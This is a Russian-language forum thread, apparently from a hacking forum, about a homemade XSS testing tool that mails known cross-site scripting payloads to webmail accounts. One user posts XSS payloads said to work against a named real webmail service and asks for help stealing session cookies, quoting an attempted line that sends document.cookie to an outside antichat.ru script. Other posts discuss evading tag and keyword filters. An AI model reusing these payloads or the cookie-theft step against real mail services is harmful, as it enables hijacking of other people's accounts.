Зацени плиз мой XSS Tester: http://sec-123.narod.ru/xss/XSSTest1_0.rar Тестирует тело письма на известные ХСС.
Проблема в том, что это будет работать только в том, случае, когда система пропускает теги, а этого практически никогда не бывает Это все нужно оформлять не через Html теги а через Bb теги например (для форумов) Да и еще OnERor пишется с двумя R
Ну это пока тестовая версия, и она только для email-ов. А за OnERor псб - торопился На счёт выложить - попозже наверно, счас программа сыровата.
Я пишу такой же, но для форумов с работай чарес прокси серверы и т.д, но не хватает информации - одному сложно искать, если у кого есть подборочки с багами и подробным описанием, скинь те плиз на [email protected] - буду очень признателен.
Чё т мне кажется, что нужны не готовые "подборочки", как для емаилов, а чтото более навороченное. P.s.: хотя я могу ошибаться
Да, нужно что бы система тестировала прохождение кавычек, тегов, ключевых слов типа javascript в разных случаях, в разных тегах и т.д.
в образовательных целях так сказать,чтоб такие юзвери как я могли трениться. ток я пока в это тесте ниче не понимаю.ключевое слово "пока".
Прога супер!!! огромное спасибо! вот только помагите правильно составить запрос... у меня что то нифига не получается вобщем вот эта xss <body onLoad=alert(2)> и вот эта <meta http-equiv=Refresh content=0;url=javascript:alert(4)> работают на mail.gala.net но никак не могу добится что бы мне пришли куки я делал вот так: <body onLoad="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie> вобщем объясните как эту xss юзать?
Приветсвтую! Вот решил испробовать XSS тестер. При завершении пишет постоянно: Error in command: must be 250, but returned -->> recived: ˜øš sended: QUIT Error in command: must be 221, but returned -->> recived: ˜øš Socket closed -------ERROR------ SMTP`session ENDed with ERROR : message not sended!!! -----END_ERROR----- Вот значит, вроде бы правильно все ввожу: в строке от: [email protected] кому: [email protected] сервер: smtp.mail.ru порт: 25 авторизация: USER: 66-66-66 PASSWORD: ********* запускаю, результат выше был описан. что не так?
